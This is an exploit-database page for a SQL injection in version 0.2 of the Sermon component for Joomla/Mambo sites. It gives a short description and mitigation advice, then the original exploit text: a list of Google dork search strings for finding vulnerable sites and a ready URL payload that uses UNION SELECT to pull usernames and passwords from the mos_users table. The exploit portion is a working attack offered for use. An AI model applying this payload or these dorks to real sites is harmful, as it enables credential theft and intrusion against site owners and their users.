header-logo
Suggest Exploit
vendor:
Sermon
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Sermon
Affected Version From: 0.2
Affected Version To: 0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:isaim:sermon
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

netadvantist@copyright 2006 SQL Injection(com_na_xxx)

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. The crafted query can be used to extract sensitive information from the database, such as usernames and passwords. The attacker can also use the crafted query to modify the database, such as adding, deleting, or modifying records.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

#########################################################################
#
# netadvantist@copyright 2006 SQL Injection(com_na_xxx)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
#########################################################################
#
# DORKS 1 : allinurl:"com_na_content"
#
# DORK 2 : allinurl:"com_na_bible"
#
# DORKS 3 : allinurl:"com_na_events"
#
# DORKS 4 : allinurl:"com_na_content"
#
# DORKS 5 : allinurl:"com_na_feedback"
#
# DORKS 6 : allinurl:"com_na_mydocs"
#
# DORKS 7 : allinurl:"com_na_churchmap"
#
# DORKS 8 : allinurl:"com_na_bibleinfo"
#
# DORKS 9 : allinurl:"com_na_dbs"
#
# DORKS 10 : allinurl:"com_na_udm"
#
# DORKS 11 : allinurl:"com_na_qforms"
#
# DORKS 12 : allinurl:"com_na_gallery2"
#
# DORKS 13 : allinurl:"com_na_publicrss"
#
# DORKS 13 : allinurl:"index.php?kwd"
#
##########################################################################
EXPLOİT:

index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,password%2C0%2C0%2C0/**/from/**/mos_users/*


##########################################################################
# S@BUN                      www.hackturkiye.com                     S@BUN
##########################################################################
# S@BUN                        i AM NOT HACKER                      S@BUN
##########################################################################

side notes:

	<name>Sermon</name>
	<creationDate>12 JAN 2006</creationDate>
	<author>Isai Michel L.</author>
	<copyright>GNU/GPL</copyright>
	<authorEmail>isai@isaim.com</authorEmail>

	<authorUrl>www.isaim.com</authorUrl>
	<version>0.2</version>

# milw0rm.com [2008-02-07]